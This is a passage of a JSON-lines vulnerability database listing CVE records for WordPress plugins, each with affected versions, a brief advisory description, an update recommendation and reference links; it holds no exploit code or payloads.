{"CVE_ID":"CVE-2024-9189","slug":"eu-vat-for-woocommerce","versionImpact":"2.12.12","versionEndExcluding":"2.12.14","description":"The EU\/UK VAT Manager for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the alg_wc_eu_vat_exempt_vat_from_admin() function in all versions up to, and including, 2.12.12. This makes it possible for unauthenticated attackers to update the VAT status for any order.","recommendation":"Update to version 2.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6db680e-1fd4-420c-98f4-2b6dc5cf6781?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6db680e-1fd4-420c-98f4-2b6dc5cf6781?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/class-alg-wc-eu-vat-ajax.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/class-alg-wc-eu-vat-ajax.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8788","slug":"eu-vat-for-woocommerce","versionImpact":"2.12.12","versionEndExcluding":"2.12.14","description":"The EU\/UK VAT Manager for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.12.11. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443c57bf-2f3d-4b8f-9dae-b11142a74341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443c57bf-2f3d-4b8f-9dae-b11142a74341?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.12\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.14\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158296\\\/eu-vat-for-woocommerce\\\/tags\\\/2.12.14\\\/includes\\\/admin\\\/class-alg-wc-eu-vat-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4872","slug":"woocommerce-chained-products","versionEndExcluding":"2.12.0","description":"The Chained Products WordPress plugin before 2.12.0 does not have authorisation and CSRF checks, and does not ensure that the option to be updated belongs to the plugin, allowing unauthenticated attackers to set arbitrary options to 'no'","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c76a1c0b-8a5b-4639-85b6-9eebc63c3aa6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c76a1c0b-8a5b-4639-85b6-9eebc63c3aa6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3766","slug":"login-lockdown","versionImpact":"2.11","versionEndExcluding":"2.12","description":"The Login Lockdown & Protection plugin for WordPress is vulnerable to unauthorized nonce access due to a missing capability check on the ajax_run_tool function in all versions up to, and including, 2.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a valid nonce that can be used to generate a global unlock key, which can in turn be used to add arbitrary IP addresses to the plugin allowlist. This can only be exploited on new installations where the site administrator hasn't visited the loginlockdown page yet.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/ajax.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/ajax.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3286814\\\/login-lockdown\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3286814\\\/login-lockdown\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac9a3848-f486-475b-b2c7-ea1007bb30d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac9a3848-f486-475b-b2c7-ea1007bb30d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11758","slug":"wp-spid-italia","versionImpact":"2.9","versionEndExcluding":"2.12","description":"The WP SPID Italia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-spid-italia\\\/trunk\\\/frontend-ui.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-spid-italia\\\/trunk\\\/frontend-ui.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cdadbf2-8b5d-4018-8cee-0d0fb07696f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cdadbf2-8b5d-4018-8cee-0d0fb07696f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1290","slug":"formidable-registration","versionImpact":"2.11","versionEndExcluding":"2.12","description":"The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take over any accounts.","recommendation":"Update to version 2.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60187d4-9491-435a-bc36-8dd348a1ffa3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a60187d4-9491-435a-bc36-8dd348a1ffa3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8319","slug":"tourfic","versionImpact":"2.11.20","versionEndExcluding":"2.11.21","description":"The Tourfic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.11.20. This is due to missing or incorrect nonce validation on the tf_order_status_email_resend_function, tf_visitor_details_edit_function, tf_checkinout_details_edit_function, tf_order_status_edit_function, tf_order_bulk_action_edit_function, tf_remove_room_order_ids, and tf_delete_old_review_fields functions. This makes it possible for unauthenticated attackers to resend order status emails, update visitor\/order details, edit check-in\/out details, edit order status, perform bulk order status updates, remove room order IDs, and delete old review fields, respectively, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.11.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3054266\\\/tourfic\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3054266\\\/tourfic\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10788","slug":"aryo-activity-log","versionImpact":"2.11.1","versionEndExcluding":"2.11.2","description":"The Activity Log \u2013 Monitor & Record User Changes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the event parameters in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.","recommendation":"Update to version 2.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aryo-activity-log\\\/tags\\\/2.11.0\\\/hooks\\\/class-aal-hook-themes.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75324bf1-a00e-4da7-8d42-d224c39ceb79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75324bf1-a00e-4da7-8d42-d224c39ceb79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12853","slug":"modula-best-grid-gallery","versionImpact":"2.11.10","versionEndExcluding":"2.11.11","description":"The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 2.11.10. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.11.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218127%40modula-best-grid-gallery&new=3218127%40modula-best-grid-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218127%40modula-best-grid-gallery&new=3218127%40modula-best-grid-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef86b1f2-d5aa-4e83-a792-5fa35734b3d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef86b1f2-d5aa-4e83-a792-5fa35734b3d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1282","slug":"drag-n-drop-upload-cf7-pro","versionEndExcluding":"2.11.1","description":"The Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard WordPress plugin before 2.11.1 and Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations WordPress plugin before 5.0.6.4 do not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b2617f-5235-4587-9eaf-d0f6bb23dc27\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b2617f-5235-4587-9eaf-d0f6bb23dc27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9548c5-59ea-46b0-bfa5-a0f7a259351a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a9548c5-59ea-46b0-bfa5-a0f7a259351a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0593","slug":"simple-job-board","versionEndExcluding":"2.11.0","description":"The Simple Job Board plugin for WordPress is vulnerable to unauthorized access of data due to insufficient authorization checking on the fetch_quick_job() function in all versions up to, and including, 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038476\\\/simple-job-board\\\/trunk\\\/includes\\\/class-simple-job-board-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3038476\\\/simple-job-board\\\/trunk\\\/includes\\\/class-simple-job-board-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8667","slug":"hurrytimer","versionImpact":"2.10.0","versionEndExcluding":"2.11.0","description":"The HurryTimer \u2013 An Scarcity and Urgency Countdown Timer for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized post publication due to a missing capability check on the activateCampaign() function in all versions up to, and including, 2.10.0. This makes it possible for authenticated attackers, with contributor-level access and above, to publish arbitrary posts like ones they have submitted for review, or a site administrator has in draft.","recommendation":"Update to version 2.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a8eda88-c45a-4867-b427-d63b586e6de3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a8eda88-c45a-4867-b427-d63b586e6de3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php#L568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173213\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173213\\\/hurrytimer\\\/trunk\\\/includes\\\/Admin.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2484","slug":"themeisle-companion","versionImpact":"2.10.34","versionEndExcluding":"2.10.35","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Services and Post Type Grid widgets in all versions up to, and including, 2.10.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd0f172-2cd3-4839-9df9-64475554d3b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd0f172-2cd3-4839-9df9-64475554d3b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/services.php#L639\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/services.php#L639\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/posts-grid.php#L1464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.33\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/posts-grid.php#L1464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055876%40themeisle-companion&new=3055876%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055876%40themeisle-companion&new=3055876%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058970%40themeisle-companion&new=3058970%40themeisle-companion&sfp_email=&sfph_mail=#file16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3058970%40themeisle-companion&new=3058970%40themeisle-companion&sfp_email=&sfph_mail=#file16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1323","slug":"themeisle-companion","versionImpact":"2.10.31","versionEndExcluding":"2.10.32","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Type Grid Widget Title in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040304\\\/themeisle-companion\\\/tags\\\/2.10.32\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/class-elementor-extra-widgets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040304\\\/themeisle-companion\\\/tags\\\/2.10.32\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/class-elementor-extra-widgets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1499","slug":"themeisle-companion","versionImpact":"2.10.30","versionEndExcluding":"2.10.31","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df40eb21-2080-4de5-9055-09246a8a275e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df40eb21-2080-4de5-9055-09246a8a275e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1037\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1037\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1229","slug":"simpleshop-cz","versionImpact":"2.10.2","versionEndExcluding":"2.10.3","description":"The SimpleShop plugin for WordPress is vulnerable to unauthorized disconnection from SimpleShop due to a missing capability check on the maybe_disconnect_simpleshop function in all versions up to, and including, 2.10.2. This makes it possible for unauthenticated attackers to disconnect the SimpleShop.","recommendation":"Update to version 2.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080151%40simpleshop-cz&new=3080151%40simpleshop-cz&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080151%40simpleshop-cz&new=3080151%40simpleshop-cz&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleshop-cz\\\/trunk\\\/src\\\/Settings.php?rev=3019145#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc39c47-3b99-4e43-b25d-a025f3d228b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc39c47-3b99-4e43-b25d-a025f3d228b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1162","slug":"themeisle-companion","versionImpact":"2.10.29","versionEndExcluding":"2.10.30","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.10.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0508","slug":"themeisle-companion","versionImpact":"2.10.27","versionEndExcluding":"2.10.28","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1010\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1019\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/vendor\\\/codeinwp\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1019\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021959\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021959\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6781","slug":"themeisle-companion","versionImpact":"2.10.26","versionEndExcluding":"2.10.27","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, and including, 2.10.26 due to insufficient input sanitization and output escaping on user supplied values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.10.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e39019-c322-4027-84f2-faabd9ca4983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e39019-c322-4027-84f2-faabd9ca4983?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L315\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/header-footer-scripts\\\/init.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3011567%40themeisle-companion%2Ftrunk&old=2991564%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_